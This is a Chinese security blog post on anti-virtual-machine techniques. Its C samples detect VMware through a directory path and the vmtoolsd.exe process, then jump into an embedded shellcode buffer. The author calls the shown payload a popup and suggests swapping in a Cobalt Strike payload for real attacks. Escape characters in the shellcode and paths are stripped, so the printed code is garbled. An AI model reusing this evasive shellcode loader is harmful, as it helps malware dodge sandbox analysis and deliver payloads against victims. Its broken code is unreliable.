反虚拟机技术之反弹shell

  • A+
所属分类:安全文章

反虚拟机技术之反弹shell

扫一扫关注公众号,长期致力于安全研究

前言:本文主要讲解如何反虚拟机



0x01 最常见的例子

在软件逆向,病毒分析等等,许多恶意程序为了自己不被调试,都运用了反虚拟机技术。当程序在虚拟机中则运行失败,甚至执行其它结果(PS:比如反弹个shell回去~~)


0x02 根据文件路径

虚拟机一般有一个路径,如果这个路径存在,一般就是在虚拟机中

C:Program FilesVMware
    既然已经知道了这个路径,那只需要判断路径是否存在即可,这里用到
PathIsDirectory函数,这个函数判断目录是否存在。
    完整代码如下:
           判断是否在虚拟机环境,如果在虚拟机环境执行shellcode(我这里是弹窗,实战中换成CS的即可),
#include <Windows.h>#include "shlwapi.h"char shellcode[] ="xfcx68x6ax0ax38x1ex68x63x89xd1x4fx68x32x74x91x0c""x8bxf4x8dx7exf4x33xdbxb7x04x2bxe3x66xbbx33x32x53""x68x75x73x65x72x54x33xd2x64x8bx5ax30x8bx4bx0cx8b""x49x1cx8bx09x8bx69x08xadx3dx6ax0ax38x1ex75x05x95""xffx57xf8x95x60x8bx45x3cx8bx4cx05x78x03xcdx8bx59""x20x03xddx33xffx47x8bx34xbbx03xf5x99x0fxbex06x3a""xc4x74x08xc1xcax07x03xd0x46xebxf1x3bx54x24x1cx75""xe4x8bx59x24x03xddx66x8bx3cx7bx8bx59x1cx03xddx03""x2cxbbx95x5fxabx57x61x3dx6ax0ax38x1ex75xa9x33xdb""x53x68x77x65x73x74x68x66x61x69x6cx8bxc4x53x50x50""x53xffx57xfcx53xffx57xf8";#pragma comment(lib, "shlwapi.lib")int _tmain(int argc, _TCHAR* argv[]){  if (PathIsDirectoryW(L"C:\Program Files\VMware")){    __asm{      lea eax, shellcode;      push eax;      ret;    }
} return 0;}
    接下来在虚拟机中运行一下,成功执行Shellcode

反虚拟机技术之反弹shell



0x03 根据进程信息

在虚拟机中,常见的默认进程有vmware.exe或者vmtoolsd.exe等等,我们只需要找到最常见的进程名,来进行判断是否存在该进程名,如果存在就进行程序退出或者反弹shell。

反虚拟机技术之反弹shell

完整代码如下:通过进程遍历,来查找进程名为vmtoolsd.exe的程序 DWORD ret = 0;      PROCESSENTRY32 pe32;      pe32.dwSize = sizeof(pe32);       HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);       if(hProcessSnap == INVALID_HANDLE_VALUE)       {           return FALSE;       }      BOOL bMore = Process32First(hProcessSnap, &pe32);       while(bMore)      {          if (strcmp(pe32.szExeFile, "vmtoolsd.exe")==0)          {              __asm{              lea eax,shellcode;              jmp eax;            }            return TRUE;          }          bMore = Process32Next(hProcessSnap, &pe32);       }      CloseHandle(hProcessSnap);



0x04 结尾

其实反虚拟机的手段是多之又多,本文只是列了两个很常见例子。

11111
微信搜索关注 "安全族" 长期致力于安全研究


下方扫一下扫,即可关注

反虚拟机技术之反弹shell




本文始发于微信公众号(安全族):反虚拟机技术之反弹shell

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: